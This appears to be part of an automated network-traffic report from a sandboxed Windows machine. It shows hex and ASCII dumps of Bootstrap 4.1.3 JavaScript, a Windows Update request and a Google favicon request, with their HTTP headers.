                                                                                                                                          Data Ascii: function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isEl
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73
                                                                                                                                          Data Ascii: e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._des
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                                                                                                                          Data Ascii: &p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d
                                                                                                                                          Data Ascii: mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64
                                                                                                                                          Data Ascii: l),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d
                                                                                                                                          Data Ascii: (!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)}
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d
                                                                                                                                          Data Ascii: t(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).rem
                                                                                                                                          2024-11-28 10:32:17 UTC1369INData Raw: 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73
                                                                                                                                          Data Ascii: DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collaps


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.44975420.109.210.53443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:17 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=EdtAHUGZ27STYf6&MD=WNDZagzh HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                          2024-11-28 10:32:18 UTC560INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Expires: -1
                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                          MS-CorrelationId: 2ce215ca-214d-4558-a6a5-00dcc9f76083
                                                                                                                                          MS-RequestId: 82faf8ec-5196-4272-878a-95dfb7c5cd9b
                                                                                                                                          MS-CV: sQZTcBtcikaPzVMM.0
                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:17 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 24490
                                                                                                                                          2024-11-28 10:32:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                          2024-11-28 10:32:18 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.449768142.250.181.1004432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:18 UTC709OUTGET /s2/favicons?domain=?v=BUILD_HASH HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:18 UTC313INHTTP/1.1 404 Not Found
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:18 GMT
                                                                                                                                          Server: sffe
                                                                                                                                          Content-Length: 1593
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-28 10:32:18 UTC1077INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65
                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-se
                                                                                                                                          2024-11-28 10:32:18 UTC516INData Raw: 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c
                                                                                                                                          Data Ascii: edia only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} <


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.449766104.18.11.2074432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:18 UTC385OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                                                                          Host: stackpath.bootstrapcdn.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:19 UTC966INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:19 GMT
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          CDN-PullZone: 252412
                                                                                                                                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                          CDN-RequestCountryCode: US
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: public, max-age=31919000
                                                                                                                                          ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                                                                                          Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                          CDN-RequestPullCode: 200
                                                                                                                                          CDN-CachedAt: 10/04/2024 02:53:43
                                                                                                                                          CDN-EdgeStorageId: 1029
                                                                                                                                          timing-allow-origin: *
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CDN-Status: 200
                                                                                                                                          CDN-RequestTime: 1
                                                                                                                                          CDN-RequestId: c6c8a086d090f1d2baac8a7b0c894894
                                                                                                                                          CDN-Cache: HIT
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 173544
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e99b181ffa54211-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-28 10:32:19 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                          Data Ascii: 7bed/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                                                                          Data Ascii: fine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defi
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44
                                                                                                                                          Data Ascii: ,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID
                                                                                                                                          2024-11-28 10:32:19 UTC1369INData Raw: 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72
                                                                                                                                          Data Ascii: andler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;retur
